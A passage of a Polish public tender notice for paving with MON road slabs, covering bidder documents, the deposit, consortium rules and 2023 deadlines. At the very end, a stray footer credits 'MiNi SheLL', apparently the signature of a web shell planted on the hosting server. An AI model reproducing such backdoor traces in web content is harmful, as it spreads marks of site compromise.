osoby/osób podpisujących<br/>ofertę nie wynika z danych ujawnionych we właściwym rejestrze oraz zobowiązania<br/>podmiotów trzecich, na których zasobach Wykonawca polega na zasadzie art. 118 PZP<br/>przy wykazywaniu spełnianiu warunków udziału w postępowaniu.<br/> Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:<br/>a) Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o<br/>ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021 poz. 275 z późn.zm) z<br/>innym wykonawcą , który złożył odrębną ofertę lub ofertę częściową, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór<br/>oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub<br/>braku przynależności do tej grupy kapitałowej stanowi załącznik nr 4 do SWZ),<br/>b) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2<br/>PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego - wystawioną nie wcześniej niż 6<br/>miesięcy przed jej złożeniem,<br/>c) wykazu robót wykonanych, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju<br/>wykonanych robót), dat wykonania (dat dziennych rozpoczęcia i zakończenia<br/>realizacji robót) i podmiotów, na rzecz których roboty zostały wykonane lub są<br/>wykonywane należycie (wzór wykazu wykonanych robót stanowi Załącznik nr 5 do<br/>SWZ).<br/>d) dowodów określających, czy wskazane przez Wykonawcę w wykazie roboty<br/>budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot.<br/>zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub<br/>są wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których<br/>mowa w pkt 7.1 SWZ oraz w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w pkt 8.1. SWZ Wykonawca składa wraz z ofertą<br/>oświadczenie, o którym mowa w art. 125 ust. 1 PZP oraz art. 273 ust. 2 ustawy Pzp w<br/>zakresie wskazanym przez Zamawiającego wraz z oświadczeniem o braku podstaw<br/>wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego – wzór oświadczenia<br/>stanowi załącznik nr 6 do SWZ.<br/>A nadto odpowiednie pełnomocnictwa (jeżeli umocowanie osoby/osób podpisujących<br/>ofertę nie wynika z danych ujawnionych we właściwym rejestrze oraz zobowiązania<br/>podmiotów trzecich, na których zasobach Wykonawca polega na zasadzie art. 118 PZP<br/>przy wykazywaniu spełnianiu warunków udziału w postępowaniu.<br/>10.2. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego<br/>oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków<br/>dowodowych:<br/>a) Oświadczenie wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o<br/>ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021 poz. 275 z późn.zm) z<br/>innym wykonawcą , który złożył odrębną ofertę lub ofertę częściową, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór<br/>oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub<br/>braku przynależności do tej grupy kapitałowej stanowi załącznik nr 4 do SWZ),<br/>b) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2<br/>PZP,(b) art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o<br/>zamówienie publiczne tytułem środka karnego - wystawioną nie wcześniej niż 6<br/>miesięcy przed jej złożeniem,<br/>c) wykazu robót wykonanych, wraz z podaniem ich wartości brutto, przedmiotu (rodzaju<br/>wykonanych robót), dat wykonania (dat dziennych rozpoczęcia i zakończenia<br/>realizacji robót) i podmiotów, na rzecz których roboty zostały wykonane lub są<br/>wykonywane należycie (wzór wykazu wykonanych robót stanowi Załącznik nr 5 do<br/>SWZ).<br/>d) dowodów określających, czy wskazane przez Wykonawcę w wykazie roboty<br/>budowlane na potwierdzenie spełnienia warunku udziału w postępowaniu dot.<br/>zdolności technicznej lub zawodowej w zakresie doświadczenia zostały wykonane lub<br/>są wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a<br/>jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczypospolitej Polskiej zamiast informacji z Krajowego Rejestru Karnego, o której<br/>mowa w pkt 10.2. lit. b) SWZ - składa informację z odpowiedniego rejestru albo, w<br/>przypadku braku takiego rejestru, inny równoważny dokument wydany przez<br/>właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania, w zakresie określonym art. 108 ust. 1 pkt 1, 2 i 4,<br/>Dokument, o którym mowa w pkt 10.2. ppkt 1 powinien być wystawiony nie wcześniej<br/>niż 6 miesięcy przed jego złożeniem.<br/> Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje<br/>się dokumentów, o których mowa w pkt. 10.2., lub gdy dokumenty te nie odnoszą się<br/>do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 PZP,<br/>zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed<br/>notariuszem lub przed organem sądowym, administracyjnym albo organem<br/>samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub<br/>miejsce zamieszkania wykonawcy.<br/>W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę,<br/>Zamawiający może zwrócić się bezpośrednio do właściwych organów kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania o udzielenie niezbędnych informacji<br/>dotyczących tego dokumentu.<br/>10.7. Jeżeli w dokumentach złożonych na potwierdzenie spełnienia warunków udziału w<br/>postępowaniu jakiekolwiek wartości zostaną podane w walucie obcej to Zamawiający<br/>przeliczy wartość waluty na złote wedle średniego kursu NBP z dnia przekazania<br/>ogłoszenia o zamówieniu do Biuletynu Zamówień Publicznych.<br/>W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba<br/>podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji.<br/>Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty –<br/>treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie;<br/>4) dokumenty, o których mowa w pkt 10.2. lit. a – c obowiązany będzie złożyć<br/>każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą<br/>ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą<br/>spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania<br/>zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak<br/>też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania<br/>umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej<br/>postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum) stosuje się odpowiednio - odrębnie dla każdego ze<br/>wspólników oraz odrębnie dla spółki. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 3000,00zł.<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków ,o<br/>których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz.U. 2023 poz. 462).<br/>Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek bankowy<br/>Zamawiającego nr 05 2030 0045 1110 0000 0076 2920 z dopiskiem: „Przetarg na utwardzenie płytami drogowymi typu MON ”.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie<br/>zaliczone na rachunku bankowym Zamawiającego.<br/>Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji<br/>ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w<br/>art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne<br/>żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie<br/>gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 12.2.<br/>ppkt 2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej, tj. opatrzonej kwalifikowanym podpisem elektronicznym osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały<br/>okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie<br/>wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie<br/>do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku,<br/>o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na<br/>podstawie art. 226 ust. 1 pkt 14 PZP.<br/>Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia,<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie<br/>kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): <br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)	oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)	Oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o zamówienie;<br/>4)	dokumenty, o których mowa w pkt 10.2. lit. a – c obowiązany będzie złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio - odrębnie dla każdego ze wspólników oraz odrębnie dla spółki.<br/>Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych aktualnych na dzień ich złożenia. <br/>Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany terminów, określonych dla niniejszego zamówienia, z przyczyn i na warunkach określonych w projekcie umowy.<br/>	Szczegółowe zagadnienia dotyczące terminu realizacji umowy uregulowane są we wzorze umowy stanowiącej załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Przed zawarciem umowy w sprawie zamówienia publicznego, Wykonawca, którego<br/>oferta została uznana za najkorzystniejszą zobowiązany jest dopełnić następujących<br/>formalności:<br/>1) wnieść wymagane zabezpieczanie należytego wykonania umowy;<br/>2) przedłożyć Zamawiającemu:<br/>a) kopię umowy regulującej współpracę wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia (np. umowę konsorcjum), jeżeli zamówienie będzie<br/>realizowane przez wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>b) dokumenty wskazane we wzorze umowy (stanowiącej załącznik nr 2 do SWZ) dot.<br/>osób wykonujących roboty budowlane tj. operatorów sprzętu i maszyn,<br/>pracowników fizycznych, jeżeli wykonanie tych czynności polega na<br/>wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca<br/>1974 r. - Kodeks pracy (tekst jedn.: Dz. U. z 2022 r. poz. 1510 z późn. zm.), tj.:<br/><br/>(i) oświadczenia Wykonawcy lub podwykonawcy o zatrudnieniu pracownika<br/>na podstawie umowy o pracę, zawierających informacje, w tym dane osobowe<br/>niezbędne do zweryfikowania zatrudnienia na podstawie umowy o pracę, w<br/>szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia<br/>umowy o pracę, rodzaj umowy o pracę, wymiar etatu oraz zakres obowiązków<br/>pracownika;<br/>(ii) poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę<br/>lub podwykonawcę kopię umowy/umów o pracę osób, do których odnosi się<br/>Obowiązek Zatrudnienia wraz z dokumentem regulującym zakres<br/>obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna<br/>zawierać informacje, w tym dane osobowe niezbędne do zweryfikowania<br/>zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko<br/>zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o<br/>pracę, wymiar etatu oraz zakres obowiązków pracownika;<br/>iii) dokument potwierdzający zgłoszenie pracownika przez pracodawcę do<br/>ubezpieczeń lub opłacenie przez pracodawcę ubezpieczeń pracownika,<br/>zanonimizowany w sposób zapewniający ochronę danych osobowych<br/>pracowników. Imię i nazwisko pracownika nie podlega anonimizacji.<br/>Niedopełnienie wskazanych formalności będzie traktowane jako uchylanie się przez<br/>Wykonawcę od zawarcia umowy w sprawie zamówienia publicznego.<br/>Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy przez<br/>wykonawcę, którego oferta została uznana za najkorzystniejszą.<br/>Zabezpieczenie należytego wykonania umowy wynosić będzie 5 % ceny całkowitej<br/>podanej w Ofercie.<br/>Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku<br/>następujących formach:<br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy<br/>oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze<br/>zobowiązaniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt<br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (tekst jedn. Dz.U. 2023r. poz. 462). Więcej informacji znajduje się w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com